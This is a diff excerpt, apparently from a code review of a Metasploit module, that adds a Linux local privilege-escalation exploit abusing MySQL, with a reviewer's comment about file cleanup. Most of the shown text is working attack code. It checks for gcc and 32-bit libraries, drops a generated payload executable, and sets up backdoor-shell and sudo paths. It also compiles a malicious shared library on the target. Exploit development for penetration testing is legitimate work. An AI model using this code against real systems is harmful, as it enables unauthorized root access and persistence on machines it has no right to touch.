modules/exploits/linux/local/mysql_priv_esc.rb

```diff
@@ -0,0 +1,248 @@
+        return true
+      end
+      false
+    end
+
+    if preload_exists?
+      return CheckCode::Detected
+    end
+
+    if check_reqs? and mysql_user?
+      return CheckCode::Appears
+    end
+
+    CheckCode::Safe
+  end
+
+  def exploit
+    # first thing we need to do is determine our method of exploitation: compiling realtime, or droping a pre-compiled version.
+    def has_prereqs?()
+      vprint_status('Checking if 32bit C libraries, gcc-multilib, and gcc are installed')
+      if target.name == "Ubuntu"
+        lib = cmd_exec('dpkg --get-selections | grep libc6-dev-i386')
+        if lib.include?('install')
+          vprint_good('libc6-dev-i386 is installed')
+        else
+          print_error('libc6-dev-i386 is not installed.  Compiling will fail.')
+        end
+        multilib = cmd_exec('dpkg --get-selections | grep ^gcc-multilib')
+        if multilib.include?('install')
+          vprint_good('gcc-multilib is installed')
+        else
+          print_error('gcc-multilib is not installed.  Compiling will fail.')
+        end
+        gcc = cmd_exec('which gcc')
+        if gcc.include?('gcc')
+          vprint_good('gcc is installed')
+        else
+          print_error('gcc is not installed.  Compiling will fail.')
+        end
+        return gcc.include?('gcc') && lib.include?('install') && multilib.include?('install')
+      else
+        return false
+      end
+    end
+    compile = has_prereqs?
+    if datastore['Compile'] == 'Auto' || datastore['Compile'] == 'True'
+      if has_prereqs?()
+        compile = true
+        vprint_status('Live compiling exploit on system')
+      else
+        vprint_status('Dropping pre-compiled exploit on system')
+      end
+    end
+
+    if check != CheckCode::Appears
+      fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
+    end
+
+    # build file names and locations
+    privesclib_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8) + ".so"
+    privescsrc_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8) + ".c"
+    pwn_file = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
+    payload_path = datastore["WritableDir"] + rand_text_alpha(8)
+    backdoorsh = datastore["BackdoorShell"]
+    backdoorpath = datastore["WritableDir"] + "/" + rand_text_alphanumeric(8)
+    suidbin = datastore["Sudo"]
+    error_log_file = datastore["ErrorLog"]
+    mysqld = datastore["MysqlDaemon"]
+
+    # lets write our payload since everythings set for priv esc
+    vprint_status("Writing payload to #{payload_path}")
+    write_file(payload_path, generate_payload_exe)
+    cmd_exec("chmod 555 #{payload_path}")
+    register_file_for_cleanup(payload_path)
+
+    # setup the files
+    rm_f pwn_file
+    if compile
+      vprint_status "Writing pwn source to #{privescsrc_file}"
+      rm_f privescsrc_file
+      write_file(privescsrc_file, pwn)
+      cmd_exec("gcc -Wall -fPIC -shared -o #{privesclib_file} #{privescsrc_file} -ldl")
```

Comment:
file is never registered for cleanup. I see later we del it, but id still register it for safety